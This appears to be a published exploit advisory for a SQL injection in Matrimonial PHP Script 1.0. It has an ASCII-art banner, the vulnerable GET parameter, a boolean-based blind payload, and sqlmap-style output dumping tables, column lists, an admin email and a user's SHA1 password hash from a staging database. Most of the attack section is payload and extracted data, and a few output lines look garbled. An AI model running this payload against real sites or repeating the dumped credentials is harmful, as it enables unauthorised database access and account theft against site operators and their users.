Matrimonial PHP Script 1.0 SQL Injection

`┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││ C r a C k E r ┌┘  
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ [ Exploits ] ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: Author : CraCkEr │ │ :  
│ Website : uisort.com │ │ │  
│ Vendor : Uisort Technologies Pvt. Ltd. │ │ │  
│ Software : Matrimonial PHP Script v1.0 │ │ Matrimonial Script PHP tailored with │  
│ Demo : stage.matrimic.in │ │ advanced features website │  
│ Vuln Type: Remote SQL Injection │ │ & mobile apps from matrimic │  
│ Method : GET │ │ │  
│ Impact : Database Access │ │ │  
│ │ │ │  
│────────────────────────────────────────────┘ └─────────────────────────────────────────│  
│ B4nks-NET irc.b4nks.tk #unix ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
: :  
│ Release Notes: │  
│ ═════════════ │  
│ Typically used for remotely exploitable vulnerabilities that can lead to │  
│ system compromise. │  
│ │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
Greets:  
Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk  
loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y  
  
CryptoJob (Twitter) twitter.com/CryptozJob  
  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘ © CraCkEr 2022 ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
  
  
GET parameter 'Userdetails[ud_gender]' is vulnerable  
  
---  
Parameter: Userdetails[ud_gender] (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: Userdetails[ud_gender]=1 AND 2636=2636  
---  
  
[+] Starting the Attack  
  
[INFO] the back-end DBMS is MySQL  
web application technology: Apache  
back-end DBMS: MySQL >= 5.0.0  
  
  
[INFO] fetching current database  
[INFO] retrieved: stage_db_qa  
  
  
[INFO] fetching number of tables for database 'stage_db_qa'  
Database: stage_db_qa  
[37 tables]  
+--------------------+  
| YiiCache |  
| YiiLog |  
| mc_admin |  
| mc_blocklist |  
| mc_caste |  
| mc_city |  
| mc_cms |  
| mc_contact |  
| mc_contact_history |  
| mc_country |  
| mc_currency |  
| mc_deleteprofile |  
| mc_education |  
| mc_feedback |  
| mc_gallery |  
| mc_height |  
| mc_horoscope |  
| mc_import_jobs |  
| mc_interest |  
| mc_language |  
| mc_message |  
| mc_occupation |  
| mc_partner |  
| mc_plan |  
| mc_profile_viewed |  
| mc_religion |  
| mc_searchlist |  
| mc_settings |  
| mc_shortlist |  
| mc_sms_history |  
| mc_state |  
| mc_subcaste |  
| mc_success_story |  
| mc_toungue |  
| mc_transaction |  
| mc_user |  
| mc_userdetails |  
+--------------------+  
  
  
[INFO] fetching columns for table 'mc_admin' in database 'stage_db_qa'  
  
Database: stage_db_qa  
Table: mc_admin  
[4 columns]  
+--------------+-------------+  
| Column | Type |  
+--------------+-------------+  
| admin_email | varchar(32) |  
| admin_id | int(11) |  
| admin_name | varchar(32) |  
| admin_status | int(11) |  
+--------------+-------------+  
  
  
[INFO] fetching number of column(s) 'admin_email,admin_id,admin_name,admin_status' entries for table 'mc_admin' in database 'stage_db_qa'  
  
Database: stage_db_qa  
Table: mc_admin  
[1 entry]  
+----------+-----------------------+------------+--------------+  
| admin_id | admin_email | admin_name | admin_status |  
+----------+-----------------------+------------+--------------+  
| 1 | admin@mat\x81imic.com | Admin | 1 |  
+----------+-----------------------+------------+--------------+  
  
  
[INFO] fetching columns for table 'mc_user' in database 'stage_db_qa'  
  
Database: stage_db_qa  
Table: mc_user  
[20 columns]  
+------------------------+--------------+  
| Column | Type |  
+------------------------+--------------+  
| api_token | varchar(255) |  
| code | varchar(128) |  
| device | varchar(32) |  
| user_activecode | varchar(32) |  
| user_activedate | datetime |  
| user_activestatus | int(11) |  
| user_android_device_id | varchar(255) |  
| user_email | varchar(32) |  
| user_id | int(11) |  
| user_ios_device_id | varchar(255) |  
| user_ipaddress | varchar(32( |  
| user_lastlogin | datetime |  
| user_mobile | bigint(20) |  
| user_opensource | varchar(32) |  
| user_password | varchar(255) |  
| user_salt | varchar(64) |  
| user_status | int(11) |  
| user_type | int(11) |  
| user_userid | int(11) |  
| user_verified_token | varchar(255) |  
+------------------------+--------------+  
  
  
[INFO] fetching number of column(s) 'user_email,user_id,user_password,user_type,user_userid' entries for table 'mc_user' in database 'stage_db_qa'  
  
Database: stage_db_qa  
Table: mc_user  
[1 entry]  
+---------+--------------------+------------------------------------------+-----------+-------------+  
| user_id | user_email | user_password | user_type | user_userid |  
+---------+--------------------+------------------------------------------+-----------+-------------+  
| 1 | [email protected] | fa4c71db18591d0323141b39ab337b59b584b3b9 | 1 | 1 |  
+---------+--------------------+------------------------------------------+-----------+-------------+  
Possible Algorithms: SHA1  
  
  
[-] Done  
`